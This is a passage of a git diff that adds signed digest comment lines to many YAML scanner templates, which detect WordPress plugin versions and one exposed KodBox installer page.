+ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml index f764988849..2073873bd6 100644 --- a/http/misconfiguration/installer/kodbox-installer.yaml +++ b/http/misconfiguration/installer/kodbox-installer.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..2eb1e1138e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f97c9f6cf51bc9e7136155d1ebd47c4965cd9479e9af2808895f06718a839eb02210089552a6a15cfd411655af54f1cd95d9309942d13f7ce470422f500de770c507b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..22f9c19cfc 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202b0dea2a98ca2ffcd00ea8f65b9c87360f28242dd23dfb5996cfd466cce5cec2022100d6d29c1120687dc26a5169c8c979880a9c558a858d08ca0c05729f37b4084306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..3be0a9443c 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dec8b27ec9c8c349bee77b231bbd05dbbd56f1b9f1888cffcbb642a851d7b787022100bffb3b907c8eaa027a8c782ef4716d0dc028fc3f8eb3562c38fdc4166149fe86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..135ebad99c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e812876c0c926937ab99728aa69c91592d0297606e423a58dcc516b6184fe91502205c17f816e9f834b8bb50f5df5bf3d4dca879b8749db560dcc70c89909a92f4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..cdea46a635 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050c3c662668cd27c75004f1483145ff944dd4e76fdd654ce398de7b8717766b9022100d1706f67e5dcbda31fa2409fb77acb245ade2fe6e30790ab4e6cdd25772f3e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..5daa824fc5 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038eb0e210ce108cd7a9c936b4e5a2312946ab1a48b9f62ad39cb4b89393b9a08022100c12a3e6c5dce5779c669fcd2adb3422b7f8e4a2e0841212b5de1d0c2e802ba15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..c3ab62eeeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6404220df1d8371d8d5ef524ec4ea0a952295b90731ef349ec6121497ed98310220469201578d660f92f1b6105ca0255a7b3b5344b4ace7f49bfbb4ac0d0005f47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..b97e21f6e4 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017f4c1a49c49999e1961701d683353e6067013193e7e99aef20ca32b2c69b50d0220494c76083779882786dedc7cb44f525003684fb5abf51f8cd231420cc6787ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..593fce9dd7 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100819ca20c4a2a165b38eceef856975fe563ed0bc24e1ca8689985e3664dc9a3880220553f6c13a6f06d91c0857b198e30b526a8400d676c24bf2df7ad1486a4909926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..7367e8ace6 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205dcb80be4535b522828d22f4f705f941b909bf8184541bc390524ca2a12d731e022062790b398253283a1c2b9ec09386a9f9dce60ac2e15ec5b858aa54ba36b09719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..cfe1145bf8 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022067d53904a19619a1696cdef2fe66798d29691de8794ff19881e006a49c696fcb022100d84bcf0356ee21ab40af757c6b3d179fdb1ee94c374ebd504f507ec71121fa76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..3ae5c4caf3 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d3dd7b32f21547074baf6756e7899bad2830b1036eec55b94f0963c6491f33502206323cd785021d58bca2ee64f548e5a3e75caf1dd1d52fc66d7775603e8792d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..3c89b5c4a9 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016634830079b47a41c3a80e549a8916d7824eb5a60b1ea2e3275accc10889288022100b8e15fc0e6b8e728ba82a2fd5932e9412ecc130946902c3b08e6366c30999bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..f0068dad3b 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069ed23484c27c6452e8f02b35b3e91201c94d3f1e0b938a7ea29d1c42869599c022100bc0557454d66d151101fdd75ac27dafbdef2f808e57f887edc711341f14032a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..a0b4b3d88f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dde3df3436f6a643e2131a0f20de65a6cebc5eac3a306c7677c5c5dd855e4806022100f36a886c8f91b9bb592cab143a3c5d7a42ab00524043730ed95b90dba6ad657d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..b3ea909edc 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022006847af405b3fa72a1fcab9457c191da36a2c449fb0a805092b1fb563e458d1f0220747f3aa90ce78172cb77a5131fdb554a6f6d2867ba7591f0717cfaf731e13aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..4bb07a6a8f 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009017a7afed4d073047c7aebdb2c04eff82e6e755501d94b1afa71129ad03bc80022007329ef664c9b3183354505ba7b8a7465ab322bc6ca274bfc37bf4a7d1657696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d659c76005 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008680804645512ff17fb1d71ceca040e7b8824ba675082411a5541633f69fb00402204ba2e3144f1541f7d8d8e283cacbe13bbab11ed6034c7f6305c7ce36d2329c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..ad34054cb4 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220041c841fa64555bdbc1c89643473afb676b0a809e579d6ccecea43535f7340f10220275b88182336fa1471c61987fe490a01afa4d07c349cce99dcb3d0803addd447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..9ce36de011 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088b15741047608265b94052a660d0eb3b8550936c34e383b1fb5897bb34f523602210082d72638a988e7f89afad62220998a42f24f049a4396c1c106fe614affb4dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..6fd25a1820 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f78b03e6915e19340e34a1a9c86f1862dde9329a3deb226842cc5acbe2e3aabe022063872f478535cedababafb4ed2c2b5fcb0ef7a7fd2cf1a5e95bc34acd5f253db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..e50e837f50 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9548a6ea0733c20702dfdafe79cc446f1dbd88df7437564f8a1aa253791bfea0220340c1527c5a11b7c270941f19cc704fbfac58a2001835257d89941b1edacad77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..c3dfb8a589 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe0f2a501cd01fbd29e16751a93bd64022eafdc9fae2b59c1f29e5937f82180b022046800d084c63e04588e0ce0e7136bc50619c3f5e467864545770f04872a512e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..51f40eaf99 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220694bc544a88da2b2fecb68f0e8a5cd28c032de588588833de4a5a2e830d4e1b202210091be2781e6b1a03b882be7a22a7e3ae55f51213667b60159d335ccce85e218de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..d7c4ee66ad 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b83d5f9bb7de4b90e030aa3cd4ffceb28be74dee65b24db29b8bc5ac2a4b67a6022053d18c5fc1ba2ca587a33b621907603cb80e1a10bc8a4fc744cd281b05e8c69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..f8dc7fb207 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077cdd2caeadf67bc68aafce986756c6bfd50db6b2ff5374b7d789ee0f4964bbd022100ec376af18037764d6d6496d31612564a9d0408b7f0c84c48fe851288f1bebebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..032549891a 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220384289cf52c3ea26b485f74e99490b805f64a4a23fb55f9e7701bf98e14d878502205ad5b70aeab8ed7cdf073c96cd336ce3109625b84c56cdf2dbde0b1aa1b46707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..70eb71510f 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e82af05065a166759b5ee7f4f0ea85c1fb4f7112aea4fb3f8d8d28b3649b2cfd0221009bed13134b379db57804bfbb48726f05f5fb7f811a2238631db34d630f59ac09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..a981f91be3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100af4f80223048e10d866ca1c1a15cdcdf8b2ecb21d28b4efa808704483b8089ac02203e666be67212b3bd922895e6b5487b9efb6d96018efd143b166d45dd6a8a0551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..f3a855ad28 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044587b35392120ae5526d928bc2eb651e28d546718a41e02122677a7590ba8de022071994f79b96eb3f51b9aa0538ef6349083d1b05eb517741fe789dd05cf9e9c08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..66dfb30a61 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2d93f904d739efa400787c004316d1440335a7091ca720846818bca543f2af2022077e25a6bd7bb4a0a1d5ce60b2f2d39c1895b2f5490013321c07cb95d760f6dbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..84eb941f9a 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db6fcd94ca32e2cf9fbe62ffadd6a3a25c25a756b26b9d22e1a9a63a1e4db626022100af5d1349d7b3196fc453ff59021956e8e50331bd54387cb08c5c9f83c2868d52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..9e60768043 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2be1d3af5a06714b4a5c86852293bdc7f5058fe8a549d3703e58364520f6d1402201804e9f050dfdf3ebc30fa02f93e126548f49701c3ab58b73ccb032ab449805b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..930a42e0f4 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5639eca9e26f19533b9c9589fb9239e347df2d49ec1e5d5e7c937ae743a0f7d0220481c788ec4e7efc3b18e6fef9f862e566fed7c1a05bc22a442c2769de9644ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..f7e4496864 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3c53f90a87ae09604cd7418dfbfe0133a8e74fc8dd26c38e86793330c61bc2402206ee3c1aa22118237f78e7b252a3f7f28aba5ef8f7fcad90fbf74baa5bb8a291c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..e9d2841f1f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a0a8280cb2c87559f340998530c430c00f74f1d91119ff1a946ef209aefe3c5022056c225d3e6c985b9b839eded1a6e306aca5c0f03e853c8c86e05a27fd7db46c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..73f7412719 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087350830926947ab2df20caf8e71f388cb22dc055778d1a8b69c924af1ea3a65022100d5eebb0f68c41959d2358fcb2fe763cae7786cd0913744d706a0b4e095ab13dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..249670ee41 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100914765f0863f614c81cbf34fbe87e0a7553535485e22c833dc26e653b1f32c470221009f5b448bd0b819633760f19fe6b5932f6a9b9728f83132aaa3176809997113a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..c50fb8eecf 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034b8a0513b4f5f13f92a4b8ff2664c6ea7d9002e0a9bebe0224d2234815b804a022100cc9b9cc7e5a18c1938b887bf79f2718832c0257dc3271ed6e06daffcad0a9b09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..65a1b01d7a 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2920b05b3520edb1b37904cf8ff21d0eb26cc493baa6f08ded205ed884ab71c022031d6b7f62af315a1dbd8ba05eff7173614df690bf1f4c1b9284eae014e09f91f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..750c5b38b6 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ccca188f28f7547f59bcbb6709a7064329f5e6720b1f54a42e98a968c0369ed602206c8b34df68e337207c1b792ab58c9810dcb7bcaa1a122bd51913516526261a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..99c90a57e9 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e77ec1ae282b6ccb8d99335332e10197d9efdc98f87bc9a9387cd02a043cbec902207d2a123c70488452512cedb6e68df4cf0abc88bec3e08428a59396a2e8c2fcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..85ea0c6d6d 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 